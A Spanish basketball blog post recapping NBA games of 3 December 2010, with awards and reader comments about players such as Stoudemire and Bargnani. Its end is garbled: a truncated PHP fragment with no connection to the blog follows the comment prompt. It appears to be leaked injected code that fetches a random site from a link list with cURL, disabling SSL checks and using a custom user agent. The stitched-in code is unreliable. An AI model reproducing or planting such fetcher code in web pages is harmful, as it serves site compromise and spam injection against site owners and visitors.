La Crónica (03/12/2010)

04 de December de 2010 por TheDeerHunter

Se enfrentaban los dos equipos más en forma del campeonato. Los Mavs llegaron a la siempre difícil cancha de Salt Lake en torno al creciente debate de si podemos empezar a considerarlos candidatos. Creo que una de las claves de poder serlo nos la mostraron anoche. Y es que dejaron a los Jazz por debajo del 40% en tiro mientras trituraban la defensa de Sloan con toda la condición del mundo. Si Nowitzki está llamando a las puertas del MVP mensual en el Oeste, Jason Kidd parece haber recuperado la juventud. No hace mucho estaríamos hablando de paseo en barca del base estrella de turno y anoche Deron no lo pasó nada bien.

La estela la coge ahora Denver que anoche ganaron a los Clippers en la vuelta de Kaman. A la chita callando se ponen muy cerca de Utah. 6 victorias seguidas y recuperando sus señas de identidad. Los Spurs también siguen a la suya, aunque anoche ganaron con más dificultades de las esperadas a unos Wolves demasiado inconsistentes (se dejaron remontar una ventaja considerable). Ojo porque los Suns también se meten en plaza de postemporada y anoche dieron buena cuenta de los complicados Pacers.

Mientras, el resto del Oeste parece haberse sumido en una sorprendente depresión. Los Lakers rompieron su crisis a costa de los Kings y jugando muy bien, pero es que el equipo de Sacramento es ahora mismo una de las Marías. Los Hornets se llevaron un meneo de muy señor mío de Stoudemire y los Nicks en New Orleans. Los Thunder sin Durant cayeron en Toronto con un Calderón maravilloso (ojo que también se han colado en la octava plaza del este) Pero es que los Blazers perdieron la 6ª consecutiva ante unos Wizards bastante mediocres. Menuda crisis.

Sin embargo los Rockets parecen haberse despertado un poco cuajando un partidazo contra los Grizzlies. De ambos nos cuesta vislumbrar si van o si vienen.

Pasando al Este tuvimos un interesantísimo Bulls@Celtics. Los verdes funcionando a pleno rendimiento no encontraron rival en un equipo que ahora está buscando ubicar a Boozer. La división central está en crisis y los Pistons se llevaron la paliza de rigor de Orlando, y eso que Supermán se quedó en casa con fiebre.

Para terminar los Hawks ganaron apurados a los Sixers y los Bobcats doblegaron a los Nets tras prórroga. Ni por esas casi no llegan a 90 puntos.

PREMIOS

MVP: Muchos candidatos… pero me quedaría con Stoudemire pasándole por encima a Okafor. 34-10 para Stat.

El rookie: Blake es Blake y si pierde su equipo rara vez es por su causa. 17-12 más 3 asistencias y 2 tapones de regalo. Debemos también valorar la contribución más oscura de Landry Fields en la victoria de los suyos en New Orleans.

La Sorpresa: Kyle Lowry que bien podría haber sido elegido MVP de la jornada. 28 ptos y 12 asistencias para hacer trizas a su ex equipo.

La decepción: A mí se me ponen los pelos de punta viendo a Mayo hacer 3 puntos y un robo en 24 minutos, absolutamente intrascendente saliendo desde el banquillo en Memphis. ¿Nos equivocamos con él?

El mayor esfuerzo en vano: La parejita Beasley-Love tuvieron contra las cuerdas a los actuales líderes. Uno 28-6 y el otro animal 25-18… y aún así perdieron.

Comenta

9 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    En el nets bobcats cuando empezaron el ultimo cuarto iban 54-68, indigno para la NBA

      Citar

  2. luigi_sal dice:
    #2

    meritoria victoria de los magic. no porq los pistons sean buenos, pero esq no han jugado howard, nelson, redick ni pietrus. buen gesto, buena racha. muy bien carter y bass, este último le va a comer la tostada a lewis en poco tiempo

      Citar

  3. Vader dice:
    #3

    Juer que temporadita se esta marcando de momento Stat… y vaya sorpresa agradable con Felton. Parece que jugando con un base, tres aleros y Amare prácticamente sólo por dentro los Knicks estan funcionando muy bien. El problema que le veo a este sistema es que no creo que sirva en los playoff contra equipos con un buen juego interior. Pero vamos si de momento sirve para conseguir un buen ratio de victorios en la regular ya me parece bien que venimos de donde venimos…

    Saludos

      Citar

  4. Mariano dice:
    #4

    Tim Duncan: 22 pts – 10 Rb – 5 Ast – 4 Tap – 3 Rob.. merece una mencion en el articulo 😉

      Citar

  5. Scriers dice:
    #5

    Declaro a los knicks mi equipo favorito de la temporada, partidos muy divertidos y a Felton y a Stat la pareja callabocas.
    y ahora viene mi debate del dia: por que tiene tan pesima prensa bargnani? parece que es kname brown y todo el mundo se refiere a el como a un estrepitoso fracaso. pero lo cierto es que a mi me parecen dignos sus 20 y 5 rebotes. vale, no es lebron pero tampoco brown. hay que diferenciar cosas. con Toronto me pasa que si Calderon tiene el dia y mueve al equipo, me lo paso bien. Lastima de tan nulo juego interior.
    En cuantoa la liga, creo que los mas interesante se cuece3 en la cabeza del oeste, con hasta 6 equipos bien metidos.

      Citar

  6. Txusma dice:
    #6

    Parece curioso comentar que Bargnani no debería tener tan mala prensa y acto seguido hablar del nulo juego interior de los Raptors. 😉

      Citar

  7. Toni dice:
    #7

    Es que es facil confundir a Bargnani con un jugador exterior ya que no pisa la pintura ni para caerse.

      Citar

  8. Scriers dice:
    #8

    Sinceramente, no veo la contradicción ni la curiosidad. Estamos hablando de un jugador que mete un alto % desde fuera y coge pocos rebotes. Pero que sin embargo tiene facultades a la hora de anotar, tiene buena mano y se crea sus propias canastas, a parte de una gran envergadura cuando va en carrera.
    De hecho, bien han hecho los Raptors en combinarlo con Evans, que hasta la lesión del segundo, la fórmula les estaba dando resultados.

      Citar

  9. Txusma dice:
    #9

    Bargnani no es tan rematadamente malo como parece que la gente nos quere vender. Ahí estoy de acuerdo contigo, Scriers. Pero no deja de ser el ala-pívot titular de su equipo y como tal debería coger alguno más de esos 5.5 rebotes que coge por noche. Se le compara con Nowitzki y es posible que en el aspecto anotador se le parezca de lejos pero creo que está claro qué es lo que le falta para dar el paso definitivo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>